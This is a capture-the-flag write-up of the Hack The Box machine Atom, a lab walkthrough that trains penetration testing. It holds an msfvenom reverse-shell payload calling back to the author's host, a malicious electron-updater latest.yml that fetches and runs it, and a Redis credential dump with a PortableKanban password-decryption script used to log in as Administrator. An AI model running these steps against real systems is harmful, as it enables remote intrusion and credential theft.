Hack The Box Write-Up Atom - 10.10.10.237
Post
Cancel

# Hack The Box Write-Up Atom - 10.10.10.237

It’s the right idea, but not the right time

John Dalton

In this post, I’m writing a write-up for the machine Atom from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Atom is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold

The initial port scan with Nmap is finding three open ports. Two ports 80/tcp and 443/tcp are related to a web service and the last one is 445/tcp the port which is used by the SMB-protocol. After enumerating the SMB-protocol we can find a PDF file which is talking about electron-builder. After some searching online we can find a Remote Code Execution vulnerability in version 1.2.3 in the Electron Updater.

User

We can create a reverse shell payload with msfvenom and use the latest.yml file to let the machine download this payload to get a reverse shell. After the reverse shell, we are authenticated as the user jason on this machine.

Root

In the Downloads folder of the user Jason, we can find a directory called PortableKanban. After some searching on the internet, we can find a password decryption vulnerability in this application. After further searching, we can also find that Redis Server is installed on this machine. Through the configuration files of Redis, we can find a password. With this password, we can establish a connection with the redis-cli to this machine. With redis-dump, we can dump the keys and hashes and we have an encrypted password for the user account Administrator. After doing some modifications to the password decryption script related to PortaleKanban we can establish an Evil-WinRM session to the machine and own Atom.

# Machine Info

 Machine Name: Atom Difficulty: Medium Points: 30 Release Date: 17 Apr 2021 IP: 10.10.10.237 Creator: MrR3boot

# Recon

## Port scan with Nmap

1 2 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# nmap -sC -sV -oA./nmap/10.10.10.237 10.10.10.237 

The results.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 Nmap scan report for atom.htb (10.10.10.237) Host is up (0.067s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-methods: |_ Potentially risky methods: TRACE |http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Heed Solutions 135/tcp open msrpc Microsoft Windows RPC 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-methods: | Potentially risky methods: TRACE |http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Heed Solutions | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_ssl-date: TLS randomness does not represent time | tls-alpn: | http/1.1 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |clock-skew: mean: 2h24m08s, deviation: 4h02m32s, median: 4m06s | smb-os-discovery: | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: ATOM | NetBIOS computer name: ATOM\x00 | Workgroup: WORKGROUP\x00 | System time: 2021-06-04T12:24:35-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-06-04T19:24:35 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Fri Jun 4 15:21:04 2021 -- 1 IP address (1 host up) scanned in 63.26 seconds 

Well, we have some results. Let’s read it carefully. First, we can determine the open ports. The first discovered open port is 80/tcp, there is running a website behind this port, running on Apache/2.4.46. The website has the HTTP title Heed Solutions. Also, the HTTPS port 443/tcp is pointing to the same website. The third open port is 139/tcp, which is the default Windows RPC port, through this protocol we can try to enumerate the system and users. 445/tcp is the default port for SMB, a file share protocol used by Microsoft operating systems. Through the open SMB port, we see that this machine is running Windows 10 Pro 19042, this is the 20H2 build of Windows 10, released in October 2020. This information was available through the user account guest, we keep that account name in our mind.

After adding the hostname atom.htb to our hosts’ file, we can visit the website on https://atom.htb. First, we checked the self-signed certificate for information, but there is no email address or something visible. We have checked the website, it’s not giving much information, than only is a website for a software application. The Windows download button leads us to https://atom.htb/releases/heed_setup_v1.0.0.zip, to download a little application.

As the website is not giving us enough information to proceed on, we jump over to the next protocol: Server Message Block (SMB).

# Enumeration

## Enumerating SMB

Let’s start with smbmap, to check for available shares. We do this with the useraccount guest.

1 2 3 4 5 6 7 8 9 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# smbmap -H 10.10.10.237 -u guest [+] IP: 10.10.10.237:445 Name: atom.htb Disk Permissions Comment ---- ----------- ------- ADMIN$NO ACCESS Remote Admin C$ NO ACCESS Default share IPC\$ READ ONLY Remote IP Software_Updates READ, WRITE 

Let’s access those shares with smbclient.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# smbclient //atom.htb/Software_Updates Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: > recurse on smb: > ls . D 0 Sat Jun 5 10:26:25 2021 .. D 0 Sat Jun 5 10:26:25 2021 client1 D 0 Sat Jun 5 10:26:25 2021 client2 D 0 Sat Jun 5 10:26:25 2021 client3 D 0 Sat Jun 5 10:26:25 2021 UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021 \client1 . D 0 Sat Jun 5 10:26:25 2021 .. D 0 Sat Jun 5 10:26:25 2021 \client2 . D 0 Sat Jun 5 10:26:25 2021 .. D 0 Sat Jun 5 10:26:25 2021 \client3 . D 0 Sat Jun 5 10:26:25 2021 .. D 0 Sat Jun 5 10:26:25 2021 4413951 blocks of size 4096. 1368892 blocks available There is a UAT_Testing_Procedures.pdf file. With get we can download this file to our system. smb: > get UAT_Testing_Procedures.pdf getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (59.4 KiloBytes/sec) (average 59.4 KiloBytes/sec) 

The UAT_Testing_Procedures.pdf is talking about electron-builder, is that the application which is being offered as a download from the website? After spending some time on the internet, I found an article that there is an application Electron Updater, which has a Remote Code Execution vulnerability in version 1.2.3. Found the information in this article: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html. This article is also talking about how to exploit this vulnerability.

# Exploitation

## Electron-Updater Remote Code Execution

Let’s create out latest.yaml file, with a reverse shell payload. First, let’s create our reverse shell payload with msfvenom.

1 2 3 4 5 6 7 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.184 LPORT=4444 -f exe > "s'hell.exe" [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes 

We can now calculate our sha512 checksum and convert it to a base64 encoded format.

1 2 3 ┌──(root💀kali)-[/home/…/htb/machines/atom/http] └─# shasum -a 512 "s'hell.exe" | cut -d " " -f1 | xxd -r -p | base64 yk6irOV/MlSY5BEDFR2aXg+41HTSyB0ggJBDXrcbJ0hVzaXS/gRNapGMtHElyXJqme4tgjiSFXrIG3LDx9a/gQ== 

We can now create our latest.yml file to call our malicious reverse shell.

1 2 3 4 version: 1.2.3 files: path: http://10.10.16.184/s'hell.exe sha512: yk6irOV/MlSY5BEDFR2aXg+41HTSyB0ggJBDXrcbJ0hVzaXS/gRNapGMtHElyXJqme4tgjiSFXrIG3LDx9a/gQ== 

We can now put our latest.yml in the //atom.htb/Software_Updater share and wait with our listener for a reverse shell with Meterpreter. After some tries, I found out that the payload has to be uploaded to the /client1 folder.

# Intrusion

## Shell as jason

After a minute waiting, the reverse shell is established.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(root💀kali)-[/home/…/htb/machines/atom/http] └─# msfconsole ... msf6 exploit(multi/handler) > use payload/windows/x64/shell_reverse_tcp msf6 payload(windows/x64/shell_reverse_tcp) > set lhost => 10.10.16.184 lhost => 10.10.16.184 msf6 exploit(multi/handler) > use exploit/multi/handler msf6 exploit(multi/handler) > set lhost 10.10.16.184 set lhost => 10.10.16.184 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.16.184:4444 [] Started reverse TCP handler on 10.10.16.184:4444 [] Command shell session 1 opened (10.10.16.184:4444 -> 10.10.10.237:62620) at 2021-06-12 15:00:29 -0400 C:\WINDOWS\system32>whoami whoami atom\jason 

Let’s check if we can grab the user flag.

1 2 3 4 5 6 C:\WINDOWS\system32>cd C:\users\jason\desktop cd C:\users\jason\desktop C:\Users\jason\Desktop>type user.txt type user.txt ad465995baf522de057af9227154a770 C:\Users\jason\Desktop> 

Nice! We have the user flag! We can now proceed to the next step: do a privilege escalation.

# Privilege Escalation

## Enumeration

We can now start to do some enumeration on this machine to escalate our privileges to administrator. We start with checking the installed applications and we can find that Redis is installed on this machine. Redis Server is default using port 6379/tcp, we have missed this port on our initial port scan. With netstat we can determine if this port is open.

1 2 3 4 PS C:\Program Files\Redis> netstat -ano | findstr "6379" netstat -ano | findstr "6379" TCP 0.0.0.0:6379 0.0.0.0:0 LISTENING 1824 TCP [::]:6379 [::]:0 LISTENING 1824 

There is also a file listed in the Downloads folder with the name PortableKanban. On exploit-DB, I found a script for encrypted password retrieval: https://www.exploit-db.com/exploits/49409. Maybe this is our way to root, but let’s check further first.

1 2 3 4 5 6 7 PS C:\Users\jason\Downloads> ls Directory: C:\Users\jason\Downloa Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 3/31/2021 2:36 AM node_modules d----- 4/2/2021 8:21 PM PortableKanban 

Ok, let’s check the configuration files of Redis for more information. We can find a clear text password in the redis.windows.conf file.

1 2 3 4 5 PS C:\Program Files\Redis> cat redis.windows.conf cat redis.windows.conf Redis configuration file example requirepass kidvscat_yes_kidvscat Note on units: when memory size is needed, it is possible to specify 

We have now the password kidvscat_yes_kidvscat. Well, let’s install redis-tools and check whether we can create a redis-cli session from our machine.

1 2 ┌──(root💀kali)-[/home/…/htb/machines/atom/http] └─# sudo apt-get install redis-tools 

We have now the utillity redis-cli at our disposal. Let’s connect to Redis with the founded password.

1 2 3 4 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. atom.htb:6379> 

Yes! We have a connection to the machine through the redis-cli. After some searching on the internet, I found a way to some interesting information from Redis. Through the command below, we can learn that there are 4 keys stored in db0.

1 2 3 4 5 6 atom.htb:6379> INFO ... # Cluster cluster_enabled:0 Keyspace db0:keys=4,expires=0,avg_ttl=0 

We know that db0 is holding 4 keys, let’s dump this whole database and check if we can find some more information. For this purpose, we need to install redis-dump. Before we can install that utility we need to install the package manager npm.

1 2 3 4 5 6 7 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# apt-get install npm Then install redis-dump. ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# npm install redis-dump -g 

## Dump database with redis-dump

We can now dump the contents of db0. Default redis-dump is using db0, so we do not have to specifiy a database.

1 2 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# redis-dump -h atom.htb -p 6379 -a kidvscat_yes_kidvscat > database0.txt 

Let’s now check the contents of the database0.txt file.

1 2 3 4 5 6 7 8 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# cat database0.txt DEL pk:ids:MetaDataClass SADD pk:ids:MetaDataClass ffffffff-ffff-ffff-ffff-ffffffffffff DEL pk:ids:User SADD pk:ids:User e8e29158-d70d-44b1-a1ba-4949d52790a0 SET pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff {"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0","SchemaVersionModified":"\/Date(1617420120000-0700)\/","SchemaVersionModifiedBy":"e8e29158d70d44b1a1ba4949d52790a0","SchemaVersionChecked":"\/Date(-62135596800000-0000)\/","SchemaVersionCheckedBy":"00000000000000000000000000000000","TimeStamp":637530169345346438}' SET pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 '{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}' 

We have found an encrypted password Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi for the user account Administrator.

We need first to install the des module.

1 2 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# python3 -m pip install des 

The next step is that we have to modify the Python script which can decrypt the password. After some testing and finetuning, I came up with this script.

1 2 3 4 5 6 7 8 9 10 11 import json import base64 from des import * #python3 -m pip install des import sys def decode(hash): hash = base64.b64decode(hash.encode('utf-8')) key = DesKey(b"7ly6UznJ") return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8') print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi")) 

We can now run this script to decode the encrypted password.

1 2 3 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# python3 49409.py [email protected] 

Nice! We have now decrypted the password. Let’s try to make an connection with evil-winrm.

## Own Atom

1 2 3 4 5 6 7 8 9 10 ┌──(root💀kali)-[/home/kali/htb/machines/atom] └─# evil-winrm -u Administrator -p "[email protected]" -i atom.htb Evil-WinRM shell v2.4 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop; cat root.txt a6599aeacd370059e059aac20be44561 *Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)